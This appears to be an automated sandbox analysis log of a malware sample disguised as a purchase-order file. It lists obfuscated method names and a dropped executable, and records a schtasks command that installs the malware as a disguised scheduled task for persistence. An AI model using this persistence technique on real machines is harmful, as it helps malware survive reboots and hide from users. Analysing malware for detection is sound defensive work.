                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.3f7eb00.3.raw.unpack, pFSoN1z3pxWU5hdNRQ.csHigh entropy of concatenated method names: 'vPVsOpjw1f', 'Pi8saKAAXd', 'igRsg7HxxM', 'ntvso2DknO', 'pFus5rejTl', 'X52sBKUWg2', 'VI7stcVJk2', 'lk3sddsEpa', 'YnnsWoKP8N', 'AVAsQA8fJr'
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.3f7eb00.3.raw.unpack, dD6GVGel8bIfjJyH7L.csHigh entropy of concatenated method names: 'MjEfFuOgJ5', 'TGjf3753e1', 'PCKff9kTN5', 'wLTfCYrfw2', 'bNLfSmaIa9', 'HaGfd5Qqj5', 'Dispose', 'Fy7415ER9x', 'RxM40W5AKL', 'c8A4DalSc4'
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.3f7eb00.3.raw.unpack, dCWYAFqcdDpAFf8lJt.csHigh entropy of concatenated method names: 'oRosDiZwkO', 'FyusbBZ8RV', 'Fl9sXBnGV9', 'Vvhs88SGV8', 'zJlsfDfOma', 'llCsp3TmkH', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.3f7eb00.3.raw.unpack, LPA1IJuLJBxY70yDDT.csHigh entropy of concatenated method names: 'ToString', 'WhfAHQFiCW', 'jCsA5yVJ2p', 'tBAAmuTjab', 'DT2ABXK3kg', 'i3GAtYbDSF', 'MILAk2k7ND', 'WhWAv2bNgj', 'gnrAJ64qip', 'W1oAjm6Wnx'
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.3f7eb00.3.raw.unpack, KTGL4SwXccYyCYLGV0.csHigh entropy of concatenated method names: 'Oh3Z8RBbpx', 'G88Zp5KWSe', 'dSdZ6dWZQg', 'fsZZYM4QVr', 'J4HZFnKWrI', 'epeZAf3ckf', 'ROxQi0bneSi55S6AC7', 'LU9y5YoV8WYMbKeW4N', 'LSBZZiKEdI', 'tTLZhfK9kA'
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.3f7eb00.3.raw.unpack, POwgeGNxX5Om6Ffrsc.csHigh entropy of concatenated method names: 'PxAE7uKsO', 'BesG7Wg0W', 'eFTOUeHCU', 'a5Qc6mjI1', 'uQigB2P1J', 'OMJrXktXA', 'YceV0uIqKymQXOe1MU', 'ShI35Pxv4GGcQIGC5N', 'rO04CXoMS', 'JMIsWdG26'
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.3f7eb00.3.raw.unpack, qRBbpxao885KWSeQTv.csHigh entropy of concatenated method names: 'VJ70TwABh2', 'zTU0R7kXZy', 'kgW0uiqnbh', 'lZh0PIs36O', 'Hhe0iQ9edl', 'Tkx097VSi4', 'vgY0e97oDg', 'BaR0LsMukl', 'DtW0IdNbTS', 'yCV0qe1cqU'
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.3f7eb00.3.raw.unpack, yWL2O9p29XpAZecQVf.csHigh entropy of concatenated method names: 'WOMhnoPUDh', 'c9Zh1Tak1w', 'QJIh0wCekT', 'WtfhDX3PVI', 'E8mhb4rL3P', 'gZphX0KSO1', 'vQeh86x4jb', 'UPrhplhQAf', 'gfghlMxgMl', 'fRyh6UaBhA'
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.3f7eb00.3.raw.unpack, o0L1oYTtJX6tuEJMB8.csHigh entropy of concatenated method names: 'fPVFMnTUNM', 'iQYFKTEeCk', 'AwwFTDvnuw', 'xMXFROS79B', 'sXqF5NC8cy', 'vmZFmtpftG', 'K7bFBmQu19', 'bd7Fto2ywn', 'WJ0FkWXkJI', 'eXtFvAtsYS'
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.3f7eb00.3.raw.unpack, q4Pwbb0EbenHeorNd0.csHigh entropy of concatenated method names: 'Dispose', 'iIfZIjJyH7', 'y5ZN5bcxiL', 'lxI8vdLbj1', 'W4AZqFsa6P', 'vwGZzshncp', 'ProcessDialogKey', 'GHuN2ag8RX', 'z3hNZ1sSbk', 'PL5NNwCWYA'
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.3f7eb00.3.raw.unpack, Sag8RXIE3h1sSbkKL5.csHigh entropy of concatenated method names: 'EPbfoVuNkI', 'SpCf5HiWUV', 'EGTfmTm7I4', 'qUAfBwBDLf', 'nBuftKPpDW', 'snqfkbPsfZ', 'kbAfvVFqH8', 'tb5fJ97OEK', 'rGcfjAikrg', 'NSvfMSIFt4'
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.3f7eb00.3.raw.unpack, i7e9RTPBnEL3cyZlCg.csHigh entropy of concatenated method names: 'Idv36H7aa0', 'kSt3YBCeTJ', 'ToString', 'sVI31X7xLT', 'zGl30BO22W', 'p863DVrlcT', 'jUo3bCt6rK', 'GLa3XHscOv', 'iop38Yri5t', 'A4y3pErhCd'
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.3f7eb00.3.raw.unpack, rQVr3OrkNTVjQt4HnK.csHigh entropy of concatenated method names: 'UTLb7d9fHL', 'EMbbc1TUrR', 'M7SDmoUB5V', 'zbtDB5Psq7', 'nTqDt1TQZA', 'gD3DkHIvMu', 'T7QDvqQjvl', 'BYlDJV8WWO', 'LxBDj41ZCr', 'KItDMTxgvv'
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.3f7eb00.3.raw.unpack, LdK1519uUXtTWRlaaa.csHigh entropy of concatenated method names: 'CsY3LeQaZ5', 'uKv3q4PDtg', 'Tvo42UI2NW', 'VdD4ZArpTi', 'pCr3HsabtO', 'lyr3Kp3fAD', 'Bv13y1JPSU', 'KQZ3Tl9hDe', 'fLx3RyoUtQ', 'Y7d3uPL7IL'
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.7710000.5.raw.unpack, tdcDZMypNH7PsaTCGo.csHigh entropy of concatenated method names: 'H6JVaXkxc3', 'Iq1VgETuyl', 'WtlVowIyeC', 'PjEV5H1LOp', 'AJqVBPnKY2', 'LoFVtpXadO', 'eGBVv7v6IK', 'JFVVJJRCoA', 'E07VM7YseP', 'RXNVH2S04g'
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.7710000.5.raw.unpack, xrInpeof3ckfb86fea.csHigh entropy of concatenated method names: 'XPgXnF9l5g', 'IulX0DmRF7', 'FmbXbRSfwG', 'y48X8ZtMeL', 'd25XpdijKu', 'bB6bitPuBk', 'eqab9BLtEK', 'pZIbelQyTX', 'XacbLYGDMJ', 'DnvbIfktYO'
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.7710000.5.raw.unpack, M3QGeQ5V12q50oqTBB.csHigh entropy of concatenated method names: 'PebWXUn1y0rR0gtWLO1', 'xla6j4nEQwaRM3tX44f', 'uBAX4qSdKQ', 'mgyXfU1HcU', 'EgmXsqvHw8', 'g5CsvcnuIgFZmctTH21', 'EIhk9TnFS74dIUGy29H'
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.7710000.5.raw.unpack, aQhDVYZZFMpEXCVf19P.csHigh entropy of concatenated method names: 'w01sqWwDYX', 'NjIszLMuZo', 'dHQC2Nxos6', 'JZYCZlS8Dd', 'A3mCNLgnLG', 'kK5Ch817kC', 'R7yCwSXFsh', 'YDFCnqM8se', 'rEaC1T11XY', 'q5xC00xwEI'
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.7710000.5.raw.unpack, yV0CmLZwt7NHJnaqf2U.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'L39xfdWqVB', 'bGfxsDeWwQ', 'Pw3xCFM7w6', 'NgexxQWcB5', 'HA4xSBgybn', 'KxpxUgDgZH', 'GYRxdVljoY'
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.7710000.5.raw.unpack, sMVw2TvGvGBQ4b3d1C.csHigh entropy of concatenated method names: 'DVn810Qrte', 'Isi8D5i9r2', 'Mcg8XKZl5Y', 'YYnXqxsU9Q', 'xRKXzkiPhE', 'g7s82K4ORE', 'yms8ZgsyiM', 'Mis8NKyr4B', 'rhU8hgWQkN', 'QWC8wbaEsK'
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.7710000.5.raw.unpack, NVM2dOjp1O3yFqPMB9.csHigh entropy of concatenated method names: 'A638WcA5MV', 'CCc8QZoQQ2', 'hbG8EiAELx', 'D7K8GGle67', 'OAV87xMx1O', 'rEh8OksbYt', 'bA18cD8ZqH', 'V0U8aspjIV', 'Uk28gouG6W', 'M428rqLb2f'
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.7710000.5.raw.unpack, UXq1PwgSddWZQg1sZM.csHigh entropy of concatenated method names: 'lUfDGLKp4Q', 'xjWDOGgICk', 'NMhDap9wq3', 'B5hDgZIIbI', 'sNrDFCWoZF', 'gZwDAOP5ol', 'IQpD35jIrq', 'MDsD4OIBkK', 'txqDfyJMgi', 'HgDDsdeqYE'
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.7710000.5.raw.unpack, pFSoN1z3pxWU5hdNRQ.csHigh entropy of concatenated method names: 'vPVsOpjw1f', 'Pi8saKAAXd', 'igRsg7HxxM', 'ntvso2DknO', 'pFus5rejTl', 'X52sBKUWg2', 'VI7stcVJk2', 'lk3sddsEpa', 'YnnsWoKP8N', 'AVAsQA8fJr'
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.7710000.5.raw.unpack, dD6GVGel8bIfjJyH7L.csHigh entropy of concatenated method names: 'MjEfFuOgJ5', 'TGjf3753e1', 'PCKff9kTN5', 'wLTfCYrfw2', 'bNLfSmaIa9', 'HaGfd5Qqj5', 'Dispose', 'Fy7415ER9x', 'RxM40W5AKL', 'c8A4DalSc4'
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.7710000.5.raw.unpack, dCWYAFqcdDpAFf8lJt.csHigh entropy of concatenated method names: 'oRosDiZwkO', 'FyusbBZ8RV', 'Fl9sXBnGV9', 'Vvhs88SGV8', 'zJlsfDfOma', 'llCsp3TmkH', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.7710000.5.raw.unpack, LPA1IJuLJBxY70yDDT.csHigh entropy of concatenated method names: 'ToString', 'WhfAHQFiCW', 'jCsA5yVJ2p', 'tBAAmuTjab', 'DT2ABXK3kg', 'i3GAtYbDSF', 'MILAk2k7ND', 'WhWAv2bNgj', 'gnrAJ64qip', 'W1oAjm6Wnx'
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.7710000.5.raw.unpack, KTGL4SwXccYyCYLGV0.csHigh entropy of concatenated method names: 'Oh3Z8RBbpx', 'G88Zp5KWSe', 'dSdZ6dWZQg', 'fsZZYM4QVr', 'J4HZFnKWrI', 'epeZAf3ckf', 'ROxQi0bneSi55S6AC7', 'LU9y5YoV8WYMbKeW4N', 'LSBZZiKEdI', 'tTLZhfK9kA'
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.7710000.5.raw.unpack, POwgeGNxX5Om6Ffrsc.csHigh entropy of concatenated method names: 'PxAE7uKsO', 'BesG7Wg0W', 'eFTOUeHCU', 'a5Qc6mjI1', 'uQigB2P1J', 'OMJrXktXA', 'YceV0uIqKymQXOe1MU', 'ShI35Pxv4GGcQIGC5N', 'rO04CXoMS', 'JMIsWdG26'
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.7710000.5.raw.unpack, qRBbpxao885KWSeQTv.csHigh entropy of concatenated method names: 'VJ70TwABh2', 'zTU0R7kXZy', 'kgW0uiqnbh', 'lZh0PIs36O', 'Hhe0iQ9edl', 'Tkx097VSi4', 'vgY0e97oDg', 'BaR0LsMukl', 'DtW0IdNbTS', 'yCV0qe1cqU'
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.7710000.5.raw.unpack, yWL2O9p29XpAZecQVf.csHigh entropy of concatenated method names: 'WOMhnoPUDh', 'c9Zh1Tak1w', 'QJIh0wCekT', 'WtfhDX3PVI', 'E8mhb4rL3P', 'gZphX0KSO1', 'vQeh86x4jb', 'UPrhplhQAf', 'gfghlMxgMl', 'fRyh6UaBhA'
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.7710000.5.raw.unpack, o0L1oYTtJX6tuEJMB8.csHigh entropy of concatenated method names: 'fPVFMnTUNM', 'iQYFKTEeCk', 'AwwFTDvnuw', 'xMXFROS79B', 'sXqF5NC8cy', 'vmZFmtpftG', 'K7bFBmQu19', 'bd7Fto2ywn', 'WJ0FkWXkJI', 'eXtFvAtsYS'
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.7710000.5.raw.unpack, q4Pwbb0EbenHeorNd0.csHigh entropy of concatenated method names: 'Dispose', 'iIfZIjJyH7', 'y5ZN5bcxiL', 'lxI8vdLbj1', 'W4AZqFsa6P', 'vwGZzshncp', 'ProcessDialogKey', 'GHuN2ag8RX', 'z3hNZ1sSbk', 'PL5NNwCWYA'
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.7710000.5.raw.unpack, Sag8RXIE3h1sSbkKL5.csHigh entropy of concatenated method names: 'EPbfoVuNkI', 'SpCf5HiWUV', 'EGTfmTm7I4', 'qUAfBwBDLf', 'nBuftKPpDW', 'snqfkbPsfZ', 'kbAfvVFqH8', 'tb5fJ97OEK', 'rGcfjAikrg', 'NSvfMSIFt4'
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.7710000.5.raw.unpack, i7e9RTPBnEL3cyZlCg.csHigh entropy of concatenated method names: 'Idv36H7aa0', 'kSt3YBCeTJ', 'ToString', 'sVI31X7xLT', 'zGl30BO22W', 'p863DVrlcT', 'jUo3bCt6rK', 'GLa3XHscOv', 'iop38Yri5t', 'A4y3pErhCd'
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.7710000.5.raw.unpack, rQVr3OrkNTVjQt4HnK.csHigh entropy of concatenated method names: 'UTLb7d9fHL', 'EMbbc1TUrR', 'M7SDmoUB5V', 'zbtDB5Psq7', 'nTqDt1TQZA', 'gD3DkHIvMu', 'T7QDvqQjvl', 'BYlDJV8WWO', 'LxBDj41ZCr', 'KItDMTxgvv'
                      Source: 0.2.Pre Alert PO TVKJEANSA00967.bat.exe.7710000.5.raw.unpack, LdK1519uUXtTWRlaaa.csHigh entropy of concatenated method names: 'CsY3LeQaZ5', 'uKv3q4PDtg', 'Tvo42UI2NW', 'VdD4ZArpTi', 'pCr3HsabtO', 'lyr3Kp3fAD', 'Bv13y1JPSU', 'KQZ3Tl9hDe', 'fLx3RyoUtQ', 'Y7d3uPL7IL'
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeFile created: C:\Users\user\AppData\Roaming\STiokuWkiGFJ.exeJump to dropped file

                      Boot Survival

                      barindex
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\STiokuWkiGFJ" /XML "C:\Users\user\AppData\Local\Temp\tmp63ED.tmp"

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Pre Alert PO TVKJEANSA00967.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
